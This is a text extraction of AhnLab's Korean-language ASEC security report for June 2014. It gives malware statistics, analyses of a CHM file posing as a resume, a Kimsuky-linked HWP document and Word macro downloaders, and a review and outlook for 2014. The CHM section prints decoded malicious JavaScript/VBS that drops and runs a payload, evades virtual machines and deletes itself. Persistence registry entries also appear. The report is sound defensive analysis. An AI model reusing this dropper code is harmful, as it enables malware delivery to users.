Security Trend ASEC Report VOL.54 June, 2014

Transcription

1 Security Trend ASEC Report VOL.54 June, 2014

2 ASEC Report VOL.54 June, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정 보를담고있습니다. 자세한내용은안랩닷컴 ( 에서확인하실수있습니다 년 6 월보안동향 1 보안통계 STATISTICS 2 보안이슈 SECURITY ISSUE 01 악성코드통계 02 웹통계 03 모바일통계 01 이력서로위장한 CHM 악성파일 02 특정인을대상으로유포된한글문서 03 워드파일의악성매크로실행주의 Table of Contents 상반기보안동향및하반기위협전망 상반기보안동향 01 보안동향 02 모바일보안동향 하반기보안위협전망 01 보안위협전망 02 모바일보안위협전망 ASEC REPORT 54 Security Trend 2

3 2014 년 6 월보안동향 1 보안통계 STATISTICS 01 악성코드통계 02 웹통계 03 모바일통계 ASEC REPORT 54 Security Trend

4 보안통계 01 악성코드통계 Statistics ASEC 이집계한바에따르면, 2014 년 6 월한달간탐지된악성코드수는 170 만 5,345 건으로나타났다. 이 는전월 171 만 87 건에비해 4,742 건감소한수치다. 한편 6 월에수집된악성코드샘플수는 261 만 1,553 건으로집계됐다. [ 그림 1-1] 에서 탐지건수 란고객이사용중인 V3 등안랩의제품이탐지한악성코드의수를의미하며, 샘플 수집수 는안랩이자체적으로수집한전체악성코드샘플수를의미한다. 5,000,000 4,000,000 3,000,000 2,717,050 2,000,000 1,000, ,884,767 4 월 2,697,234 5 월 1,710,087 2,611,553 6 월 1,705,345 탐지건수샘플수집수 [ 그림 1-1] 악성코드추이 ASEC REPORT 54 Security Trend 4

5 [ 그림 1-2] 는 2014 년 6 월한달간유포된악성코드를주요유형별로집계한결과이다. 불필요한프로그 램인 PUP(Potentially Unwanted Program) 가 40.94% 로가장높은비중을차지했고, 트로이목마 (Trojan) 계열의악성코드가 33.28%, 애드웨어 (Adware) 가 8.27% 로그뒤를이었다. 8.27% 40.94% 17.51% 33.28% PUP Trojan etc Adware [ 그림 1-2] 주요악성코드유형 [ 표 1-1] 은 6 월한달간가장빈번하게탐지된악성코드 10 건을진단명기준으로정리한것이다. PUP/Win32.Kraddare 가총 12 만 6,618 건으로가장많이탐지되었고, PUP/Win32.MicroLab 이 11 만 1,445 건으로그뒤를이었다. [ 표 1-1] 악성코드탐지최다 10건 ( 진단명기준 ) 순위 악성코드진단명 탐지건수 1 PUP/Win32.Kraddare 126,618 2 PUP/Win32.MicroLab 111,445 3 PUP/Win32.IntClient 104,918 4 Trojan/Win32.Agent 77,584 5 Trojan/Win32.Gen 58,009 6 Trojan/Win32.ADH 41,367 7 ASD.Prevention 37,001 8 Trojan/Win32.OnlineGameHack 35,489 9 Unwanted/Win32.Agent 30, PUP/Win32.GearExt 28,953 ASEC REPORT 54 Security Trend 5

6 보안통계 02 웹통계 Statistics 2014 년 6 월악성코드유포지로악용된도메인은 1,406 개, URL 은 1 만 218 개로집계됐다 ([ 그림 1-3]). 또 한 6 월의악성도메인및 URL 차단건수는총 214 만 7,161 건이다 ([ 그림 1-4]). 악성도메인및 URL 차단 건수는 PC 등시스템이악성코드유포지로악용된웹사이트에접속하는것을차단한수이다. 5,000,000 4,567,453 4,000,000 3,000,000 2,000,000 1,776,498 2,147,161 1,000,000 50,000 40,000 30,000 20,000 19,644 10,000 3,186 1,257 7,575 1,406 10,218 악성도메인 /URL 차단건수 악성코드유포도메인수 0 4 월 5 월 6 월 악성코드유포 URL 수 [ 그림 1-3] 악성코드유포도메인 /URL 탐지및차단건수 ASEC REPORT 54 Security Trend 6

7 보안통계 03 모바일통계 Statistics 2014 년 6 월한달간탐지된모바일악성코드는 26 만 3,993 건으로나타났다. 263, , , , ,000 80,461 75,853 50, 월 5 월 6 월 [ 그림 1-4] 모바일악성코드추이 ASEC REPORT 54 Security Trend 7

8 [ 표 1-2] 는 6 월한달간탐지된모바일악성코드유형중상위 10 건을정리한것이다. 안드로이드애플리케 이션에번들로설치되어광고를노출하는 Android/PUP/Dowgin 이가장많이탐지되었다. [ 표 1-2] 유형별모바일악성코드탐지상위 10 건 순위악성코드진단명탐지건수 1 Android-PUP/Dowgin 44,431 2 Android-PUP/Wapsx 21,638 3 Android-Trojan/FakeInst 18,955 4 Android-Trojan/GinMaster 16,805 5 Android-Trojan/SMSAgent 16,640 6 Android-Trojan/Oqx 11,200 7 Android-Trojan/Mseg 10,967 8 Android-PUP/Gallm 9,262 9 Android-PUP/Kuguo 8, Android-Trojan/Midown 6,764 ASEC REPORT 54 Security Trend 8

9 년 6 월보안동향 보안이슈 SECURITY ISSUE 01 이력서로위장한 CHM 악성파일 02 특정인을대상으로유포된한글문서 03 워드파일의악성매크로실행주의 ASEC REPORT 54 Security Trend

10 보안이슈 01 Security Issue 이력서로위장한 CHM 악성파일 이력서로위장한 CHM 파일이발견돼주의가요구 된다. 해당 CHM 파일에는 [ 표 2-1] 과같이여러종 류의파일이포함되어있다. /Main.html - 이력서파일 + vbs 생성하는자바스크립트 ( 패킹 ) /1.htm - 가상머신체크후 xml.htm을불러와악성파일을생성하는 vbs /mypic.jpg - 이력서사진 /Resume_screen.css - 이력서 css /xml.htm - base64 인코딩된악성파일표 2-1 CHM에포함되어있는파일들 CHM 파일을클릭하면 [ 그림 2-1] 과같이이력서형식의 Main.html 파일을실행한다. 이때해당 html에첨부되어있는악성자바스크립트가실행된다 ([ 그림 2-2]). 그림 2-1 이력서로위장한 CHM 악성파일 그림 2-2 Main.html 에첨부되어있는자바스크립트 해당스크립트를복호화하면 [ 표 2-2] 와같이 echo 명령어를통해 %temp% s.vbs 를생성하고파일을실행한다. <object id='writevbs0' type='application/ x-oleobject' classid='clsid:adb880a6-d8ff-11cf aa003b7a11' STYLE='display:none' codebase='hhctrl.ocx#version=4,74,8793,0'> <param name='command' value='shortcut'> <param name='item1' value=',mshta,vbscript:creat eobject("wscript.shell").run("cmd /c echo On Error Resume Next:Set w=getobject(""winmgmts:\\.\ root\cimv2""):set q=w.execquery(""select * from win32_process""):for Each p In q:if InStr(p. CommandLine,"".chm"")>0 Then:url=""msits:""+Trim(Replace(Replace(p.CommandLine,p. executablepath,""""),chr(34),""""))+""::/1. htm"":end If:Next:Set M=CreateObject(""CDO. Message""):m.CreateMHTMLBody url,31:execute(m. HTMLBody)>%temp%\s.vbs",0)(window.close)'> ASEC REPORT 54 Security Trend 10

11 </object> <object id='download' type='application/ x-oleobject' classid='clsid:adb880a6-d8ff-11cf aa003b7a11' STYLE='display:none' codebase='hhctrl.ocx#version=4,74,8793,0'> Download.HHClick() 표 2-2 복호화된자바스크립트 [ 표 2-3] 의복호화된 1.html vbs 소스에서현재실행중인프로세스목록중에 vmtoolsd.exe 가있으면종료코드가존재한다. 이는가상환경에서의분석을방해하기위한것이다. 이후 xml.htm 에서파일스트링을읽어와저장하여실행한다. 생성된 vbs는프로세스목록에서 chm 파일을찾아 1.htm 을실행한다. 1.htm 은난독화되어있으며이를풀면 [ 표 2-3] 과같은소스코드를확인할수있다. fp=s.expandenvironmentstrings("%temp%")&"\"& outfile Set w = GetObject("winmgmts:{impersonationLevel =impersonate}!\\.\root\cimv2") set pa=w.execquery("select * from win32_process") For Each p In pa If LCase(p.caption) = LCase("vmtoolsd.exe") Then delself() wsh.quit End If If InStr(LCase(p.CommandLine),LCase(".chm"))>0 Then url="ms-its:"&trim(replace(replace(p. CommandLine,p.executablepath,""),Chr(34),""))&"::/ xml.htm"... 중략... End With s.run fp,0 delself() Sub delself() CreateObject("Scripting.FileSystemObject"). DeleteFile(wscript.scriptfullname) End Sub [ 표 2-3] 의복호화된 1.html vbs 소스에서현재 표 2-3 복호화된 1.html vbs 소스 그림 2-3 xml.htm 에 base64 로인코딩되어있는악성코드 생성된악성코드는 IE(Internet Explorer) 를방화벽에예외등록한후특정 IP로비정상 http 접속을하는등기타동작을수행한다. 이러한공격을예방하기위해서는요구하지않은이력서나의심스러운확장자의파일은열지말아야한다. V3 제품에서는관련악성코드를다음과같이진단하고있다. <V3 제품군의진단명 > CHM/Exploit ( ) Trojan/Win32.PlugX ( ) ASEC REPORT 54 Security Trend 11

12 보안이슈 02 Security Issue 특정인을대상으로유포된한글문서 특정인을대상으로유포된한글문서파일 (HWP) 이확인되었다. 정확한유포경로와형태는확인되지않았지만이메일을통해유포되었다. 취약점이있는한글문서는 성우회연락처.hwp 파일명으로성우회 ( 예비역장성모임 ) 와관련된수신인을대상으로유포된것으로보인다. 파일의일부기능이 kimsuky 악성코드와유사하며관련변종으로확인되었다. Kimsuky 악성코드에대한자세한분석정보는아래의링크를통해확인할수있다. The Kimsuky Operation으로명명된한국을대상으로한 APT 공격 (2013/09/12) APT 공격 - 새로운 Kimsuky 악성코드등장 (2014/03/19) [ 그림 2-4] 와같이한글문서를실행하면 06성우회연락처 라는제목으로이름, 메일주소, 휴대전화번호목록을확인할수있다. 그림 2-4 한글문서 (HWP) 내용 주요생성파일은다음과같다. [ 파일생성 ] %TEMP%\en.dll %SYSTEMROOT%\Media\en.dll 그리고시스템재시작시에도실행될수있도록다음과같이서비스에등록한다. [HKLM\SYSTEM\ControlSet001\Services\ VDM] DisplayName ="Virtual Disk Manager" ObjectName ="LocalSystem" [HKLM\SYSTEM\ControlSet001\Services\ VDM\Parameters] ServiceDll ="C:\WINDOWS\Media\en.dll" ASEC REPORT 54 Security Trend 12

13 그림 2-5 서비스등록확인 [ 그림 2-6] 과같이파일내부에는몇가지기능을짐작할수있는스트링정보가확인된다. 이정보는상위에링크된 ASEC 블로그의 kimsuky 악성코드분석정보의일부내용과도유사하다. 또한특정메일계정정보 (jack84932@india. com) 를이용한것이확인되었으며, 이는수집된정보를유출할때사용한것으로보인다. 해당 HWP 파일에의한악성코드감염은한글 2007 버전에서확인되었으며한글 2010 버전에서는감염이이루어지지않았다. V3 제품에서는관련악성코드를다음과같이진단하고있다. 그림 2-6 UAC(User Account Control) 우회 <V3 제품군의진단명 > HWP/Exploit ( ) Trojan/Win32.Kimsuky ( ) 그림 2-7 백신및윈도방화벽무력화시도 ASEC REPORT 54 Security Trend 13

14 보안이슈 03 Security Issue 워드파일의악성매크로실행주의 파일작성시매크로기능을사용하면반복적인작업을빠르고편리하게할수있다. 하지만매크로기능이악성코드유포에사용되고있어주의가필요하다. [ 그림 2-8] 은악성매크로를포함한워드파일을실행한화면이다. 그림 2-9 매크로실행경고및매크로정보 그림 2-8 매크로설정및워드파일실행화면 [ 그림 2-8] 과같이워드옵션에매크로설정이되어있으면보안경고메시지를띄우며매크로가즉시실행되지는않는다. 하지만문서제작자는해당문서의내용을통해사용자의호기심을자극하여매크로기능을사용하도록유도한다. 문서내용에따라옵션을클릭하면 [ 그림 2-9] 와같이보안경고및매크로실행여부메시지가뜬다. 사용자가 이콘텐츠사용 을선택하면 [ 그림 2-9] 와같은내용의매크로가실행되며특정 URL에서악성코드를다운로드받는다. 다운로드된악성코드는 Rarsfx 로압축되어있다. 압축된악성코드는 Temp 경로에 MSFOYC.exe 파일명으로자신을복사한후실행한다. 이후동작에필요한다수의파일을드롭및실행하며로그인할때마다자동으로실행되도록 [ 표 2-4] 와같이레지스트리에등록한다. HKCU\Software\Microsoft\Windows\ CurrentVersion\Run\{63F2FA4F-D9BC-D677-78F9-CBCD4ED816AA} "C:\Documents and Settings\Administrator\ Application Data\[ 랜덤문자열 ]\[ 랜덤문자열 ].exe" ASEC REPORT 54 Security Trend 14

15 HKLM\SYSTEM\ControlSet001\Services\ SharedAccess\Parameters\FirewallPolicy\ StandardProfile\AuthorizedApplications\List\ C:\WINDOWS\explorer.exe "C:\WINDOWS\explorer.exe:*:Enabled:Windows Explorer" 표 2-4 등록된레지스트리정보또한방화벽에예외로 explorer.exe 의등록을시도하고 C&C로추정되는 URL에지속적으로접근을시도한다. 이외에도아웃룩의주소록과폴더등개인용인증서와사용자의메일정보및계정정보에접근하려는시도도확인되었다. 응용프로그램의취약점을이용하여악성코드를드롭하는경우보안취약점이패치되었다면해당악성코드에감염되지않는다. 하지만이와같이사회공학기법으로사용자의행동을유도하는경우에는보안패치가되어있더라도부주의하면악성코드에감염될수있다. 따라서이러한악성코드에감염되지않으려면의심스러운첨부파일이나문서파일은실행하지않는것이중요하다. 그림 2-10 방화벽해제시도 V3 제품에서는관련악성코드를다음과같이진단하고있다. <V3 제품군의진단명 > DOC/Downloader ( ) Dropper/Agent ( ) Win-Trojan/Loader.6656 ( ) BinImage/Injector ( ) 그림 2-11 C&C 연결 ASEC REPORT 54 Security Trend 15

16 2014 상반기보안동향및하반기위협전망 상반기보안동향 01 보안동향 02 모바일보안동향 ASEC REPORT 54 Security Trend

17 2014 상반기보안동향 01 보안동향 개인정보유출지난상반기에는기업의개인정보에대한관리소홀과해킹으로개인정보유출사건이많았다. 해외에서는유럽통신사와미국쇼핑몰의해킹으로수백만명에서수억명의개인정보가유출되었다. 우리나라에서도연초에부정사용방지시스템을개발하는신용평가업체직원이 1억여건의카드사내부정보를유출하였으며통신사에서는천만명가량의개인정보가유출되었다. 개인정보는금전과관련된민감한정보가많아공격자들의해킹시도가끊임없이발생하고있다. 윈도 XP 지원종료마이크로소프트사는자사의소프트웨어지원정책에따라지난 4월 8일윈도 XP 운영체제의지원을종료한다고발표했다. 이보안이슈는마치 2000년 1월 1 일에우려했던 Y2K( 밀레니엄버그 ) 사건을연상시킨다. 지원종료발표당시우려했던것과달리지금까지 XP로인한큰보안사고는발견되지않았다. 하지만서비스가중단된운영체제를그대로사용한다는것은위협의불씨를안고있는것이므로운영체제의변경이나, 업그레이드등의근본적인보완조치를취해야한다. 국내외 POS 시스템해킹 2013년말미국유통사의 POS(Point-Of-Sales) 시스템이해킹되어 7,000만명이상의개인정보가유출되었다. 이사건이후미국백화점, 식당등의 POS 시스템이해킹돼신용카드의정보유출이꾸준히발생하고있다. 국내에서도 POS 단말기를해킹해유출한정보로 149장의위조카드를만든일당이검거되었다. 이들은 POS 시스템공급업체의서버를해킹하여정상파일을악성코드로교체하는방식을이용하였다. IoT 보안문제발생사물인터넷 (IoT) 의보안문제가발생하기시작했다. 특히인터넷공유기가문제가되면서리눅스로운영되는인터넷공유기를감염시키는웜이등장하였다. 또가상화폐인비트코인이유행하면서일부악성코드는비트코인채굴기능도포함하고있다. 국내에서도무선인터넷공유기 DNS 주소를변경하여악성코드를배포하고 DDoS 공격에냉난방관리용셋톱박스가이용되었다. 아직대부분의사물인터넷에는보안기능이마련되지않아근본적인해결이어려운상태이다. ASEC REPORT 54 Security Trend 17

18 전자금융사기수법의다양화 2013년하반기부터올해초까지이슈가되었던메모리해킹기법의악성코드는탈취대상인은행들이보안모듈기능을강화하면서한풀꺾인추세이다. 하지만파밍기법 (hosts 또는 hosts.ics 변조 ) 을이용한악성코드는여전히사용자의금융정보탈취를시도하고있으며, 피해사례도꾸준히발생하고있다. 최근에는공유기설정상의보안문제를이용하여공유기에설정된 DNS를변조함으로써허위포털사이트접속및팝업을띄워사용자의금융정보를탈취하려는시도도발생하였다. (HeartBleed) 취약점은한글로표현하면 심장출혈 을의미한다. 그이름만큼이나강한인상을남겼던해당취약점 (CVE ) 은 SSL/TLS 를구현한오픈SSL 라이브러리상의문제로메모리상에올려진민감한데이터가노출될수있다. 상반기동안 6건이나되는오픈SSL 라이브러리취약점들이추가로발견되었다. 웹, 이메일, 메신저및 VPN(Virtual Private Network) 과같은광범위한애플리케이션에보안적용을위해사용한라이브러리가오히려사용자및보안관계자들의심장을바짝긴장하게했던사건이다. 랜섬웨어의다변화그동안해외에서다수보고되었던랜섬웨어가국내에서는작년하반기부터증가하기시작하면서다양한변종으로확산되었다. 최근에는랜섬웨어에의해암호화된데이터를복구해주는대가로추적이어려운비트코인을요구하는사례가많으며, 지정된시간내에지불하지않을경우요구금액을인상하는등피해자들의심리를교묘하게악용하고있다. 여기에안드로이드스마트폰으로영역을확장하여다양한플랫폼으로까지위협이증가하고있다. 심각한서버보안취약점연이어등장지난상반기에는심각한서버보안취약점들이다수보고되었다. 첫번째로알려진 하트블리드 두번째취약점은아파치 (Apache) 웹서버를공격할수있는아파치스트럿츠 (Apache Struts) 보안우회취약점 (CVE ) 이다. 이취약점은자바 EE 웹애플리케이션개발을위해설치되는스트럿츠프레임워크상의문제로, 정상적인서비스운영을방해하고공격자가원하는코드를수행할수있는위험이있다. 해당프레임워크상의취약점또한이미여러차례발표된바있다. 이처럼상반기에는클라이언트시스템을주로공격하는현재트렌드속에서오랜만에굵직한서버공격취약점을접했고, 보안을위해적용한방어막도잘못사용할경우더큰위협이될수있다는것을상기시켰다. ASEC REPORT 54 Security Trend 18

19 2014 상반기보안동향 02 모바일보안동향 하이브리드악성코드발견악성코드제작자는더이상플랫폼을구분하지않는다. 이제까지 PC 악성코드제작자는 PC만을대상으로악성코드를제작하고, 모바일악성코드제작자는모바일플랫폼을대상으로악성코드를제작하였다. 그러나 2014년상반기에발견된악성코드중일부는 PC를먼저감염시킨후모바일단말기에악성코드를감염시키는기능을포함하고있다. 이악성코드는감염된 PC로모바일단말기가연결되는것을감지해악성앱으로변환하여설치한다. 또공유기의취약점을공격하여공유기에설정된 DNS 정보를변조하는기법도확인되었다. 과거에는 PC의호스트 (hosts) 파일을변조하여유명사이트접근시피싱사이트로연결을유도하였다. 그러나이제는공유기의취약점을이용하여 DNS 설정을변경하는방법으로변조된공유기에연결된 PC와모바일단말기모두에영향을미치는방법도활용되고있다. 스미싱악성앱의고도화스미싱악성앱은 SMS에포함된 URL 형태로유포된다. 초기에는 SMS에포함된 URL에접속할경우앱 (APK) 이다운로드되는단순한형태였다. 하지만 이제는접속한클라이언트가모바일단말기일경우에만악성앱을다운로드받을수있도록진화하였다. 정교한피싱사이트를제작하여사용자를속이는방법과캡챠코드 (CAPTCHA) 를도입한경우도확인되었다. 배포방법과기능적인면에서도많은변화가있었다. 초기형태의스미싱악성코드는 C&C 서버의주소 (URL 또는 IP) 가내부에하드코딩되어있었으며 HTTP를통해서만명령을전달받은반면최근확인된스미싱악성코드는 SNS의댓글, SMS, XMPP( 인스턴트메신저를위한국제표준규격 ) 등다양한방법으로 C&C로부터명령을전달받는것으로진화하고있다. 스미싱, 소액결제에서스마트폰뱅킹으로공격집중 2014년이전까지발견된국내스미싱악성코드는휴대전화인증방식을이용하는소액결제또는스마트폰뱅킹을공격대상으로삼는두가지형태였다. 그러나 2014년초부터최근까지소액결제를노리는악성코드는더이상발견되지않았다. 소액결제에이용되는휴대전화인증절차가강화됨에따라악성코드제작 ASEC REPORT 54 Security Trend 19

20 자들이스마트폰뱅킹으로공격대상을집중한것으로보인다. 최근발견되고있는인터넷뱅킹정보탈취악성앱은가짜은행앱을다운로드하는다운로더와다운로드되는가짜은행앱들로구성된다. 설치되는가짜은행앱은아이콘과화면구성까지실제은행앱과매우유사하며사용자가입력한계좌번호, 계좌비밀번호, 보안카드번호등금융거래에필요한정보와기기에저장된공인인증서를탈취한다. 모바일랜섬웨어의위협모바일랜섬웨어는감염된스마트폰의 SD 카드에저장되어있는모든데이터를암호화시킨다. 매우높은수준의암호화알고리즘을사용하기때문에사실상악성앱제작자의복호화키말고는해제시킬방법이없다. 모바일랜섬웨어에감염되면사진, 동영상, 음악, 영화, 문서, 앱데이터파일들이모두암호화되어사용할수없다. 악성앱제작자는이런파일들을인질로삼은후사용자에게금전을요구한다. 최초로발견된모바일랜섬웨어는우크라이나사용자를노리고제작되었지만우리나라도모바일랜섬웨어의위협에서안전하지않다. 우리나라처럼스마트폰과모바일뱅킹이발달한환경에서모바일랜섬웨어는더욱치명적이다. 랜섬웨어에감염된상태에서모바일뱅킹으로계좌이체를진행하다오히려뱅킹계정마 저탈취당하여더큰피해를입을수있기때문이다. 앞으로우리나라모바일사용자를목표로한모바일랜섬웨어와뱅킹계정탈취악성앱이결합된형태의새로운위협이발생할것으로예상된다. 특정대상을감시하는스파이앱증가 2014년상반기에는 2~3년전과유사하게불특정다수를대상으로개인정보를유출하는스미싱악성코드가꾸준히증가하였다. 주로택배, 차량단속적발, 등기, 예비군훈련등의내용으로위장하여전파되었다. 그러나최근에는특정대상의통화내용, 문자메시지, 사진, 인터넷검색기록, GPS 정보등을실시간으로엿볼수있는 스파이앱 이증가하고있다. 스파이앱은상용앱으로제작사홈페이지에접속하면설치방법과자세한기능들을확인할수있다. 월이용료 3 만원 ~ 10만원을결제하면구매자이메일을통해다운로드받을수있다. 앱의유포는특정피해자의스마트폰에직접설치하거나문자, 메일, 메시지등으로 URL을보내설치를유도하는방법이사용되고있다. 스파이앱은자녀들의비행이나배우자의외도를감시하는것이상대적으로쉬운만큼앞으로도지속적으로증가할것으로예상된다. ASEC REPORT 54 Security Trend 20

21 2014 상반기보안동향및하반기위협전망 하반기보안위협전망 01 보안위협전망 02 모바일보안위협전망 ASEC REPORT 54 Security Trend

22 2014 하반기보안위협전망 01 보안위협전망 악성코드수법의다양화로전자금융사기증가금융정보탈취의최종목적은사용자의예금을갈취하는것이다. 이를위해악성코드제작자는지금까지피싱 (phishing), 메모리해킹, 호스트 (hosts) 또는 hosts.ics 파일변조와공유기 DNS 설정변경, 스미싱등다양한방법을사용해왔다. 향후악성코드유포방법에있어지금보다더사용자가인지하기어려운방법 ( 정상프로그램의업데이트파일변조등 ) 을사용할가능성이높다. 하지만악성코드의전자금융사기수법은지금과크게달라지지는않을것이며, 호스트및 hosts.ics 파일변조가가장많이사용될것으로예상된다. 다양해지는 APT 표적공격기법호기심을자극하는이메일로특정대상을공격하는스피어피싱은하반기에도꾸준히지속될것으로예상된다. 이러한사회공학적기법에인천아시안게임이나북한이슈등이악용될가능성이높다. 여기에해킹된웹사이트에접속하면제로데이취약점을통해악성코드를감염시키는워터링홀 (Watering Hole) 기법도이용될것으로보인다. 또한오픈소스의취약점을이용한공격도가능할것으로예상되는데최근발견된오픈SSL 취약점인하트블리드 (HeartBleed) 가대표적이다. 공격대상도금융기관및일반기업으로확대되고있는추세여서기업의경제적손실이나기밀유출등에항상대비해야한다. IoT 보안문제발생사물인터넷사용이증가하면서이에대한보안문제도발생할것으로보인다. 특히업계에서사물인터넷의표준화작업을시도하고있는데표준화가완료된후보안에취약한플랫폼이선정된다면앞으로큰재난이발생할수있다. 하반기에바로이런일이발생하지는않겠지만사물인터넷의보안문제는보급과보안정도에따라큰문제가될가능성이높다. 개발사및콘텐츠전송네트워크업체해킹개발사및콘텐츠전송네트워크 (CDN) 업체를해킹하려는시도가증가할것으로예상된다. 많은사람들이개발사에서제공하는소프트웨어를신뢰하고있지만보안에취약한개발사들이있기마련이다. 또 CDN 업체를해킹하여업로드된파일을악성코드로 ASEC REPORT 54 Security Trend 22

23 교체할경우개발사에서보안에대비하고있더라도악성코드에감염된프로그램이고객에게재배포될수도있다. 따라서개발사와콘텐츠전송네트워크업체의보안강화가필요하다. 국가간사이버분쟁심화국가간사이버분쟁이더욱심화될것으로보인다. 몇년동안여러주요국가는특정국에서사이버첩 보와공격을하고있다고주장하고구체적인증거를내놓기도했다. 미국정부는자국에서사이버스파이행위를한중국인을기소하고용의자를검거하기도했다. 이에대해중국정부는미국운영체계와보안제품의사용중지를검토하는등국가간사이버분쟁으로이어질조짐을보이고있다. 미국과중국간사이버분쟁외에도다른국가간사이버분쟁은계속될것으로보인다. ASEC REPORT 54 Security Trend 23

24 2014 하반기보안위협전망 02 모바일보안위협전망 스미싱의증가및고도화앞으로인터넷뱅킹을통한금융거래나결제를위해필요한개인정보및금융정보를탈취하는스미싱기법이보다더교묘해질것으로예상된다. 일반사용자들이의심없이악성앱을설치하도록사회공학적기법을이용한문구를사용하거나정상서비스와구분이어려울만큼정교한형태의피싱사이트를구성할것으로보인다. 또한사용자가취약한시간대에집중적으로스미싱을배포하는등보다다양하고정교한방법이사용될것으로보이며보안제품의진단을회피하기위한다양한시도역시지속될것으로전망된다. 여기에반복되는개인정보유출과이미악성앱에감염된사용자의단말기에저장된전화번호부유출도 이어질것으로보인다. 이를활용한스미싱기법도더욱증가할것으로예상된다. 하이브리드악성코드증가스마트폰사용자는충전이나데이터교환등을위하여 PC에스마트폰을자주연결한다. 이를악용하여중요한데이터를유출하거나추가로악성코드를설치하는등의하이브리드악성코드및악성앱이증가할것으로예상된다. 특히스마트폰에는개인정보, 금융거래에필요한각종정보, 기업정보, 사생활정보등악성코드제작자입장에서는금전적으로이용할가치가높은데이터가많이저장되어있다. 악성코드제작자는 1차로 PC를감염시킨후감염된 PC를통해 2차로스마트폰을감염시켜보다효과적으로중요정보를유출하려는시도가계속될것으로전망된다. ASEC REPORT 54 Security Trend 24

25 ASEC REPORT vol.54 June, 2014 집필 안랩시큐리티대응센터 (ASEC) 발행처 주식회사안랩 편집 안랩콘텐츠기획팀 경기도성남시분당구판교역로 220 디자인 안랩 UX디자인팀 T F 본간행물의어떤부분도안랩의서면동의없이복제, 복사, 검색시스템으로저장또는전송될수없습니다. 안랩, 안랩로고는안랩의등록상표입니다. 그외다른제품또는회사이름은해당소유자의상표또는등록상표일수있습니다. 본문서에수록된정보는고지없이변경될수있습니다 AhnLab, Inc. All rights reserved.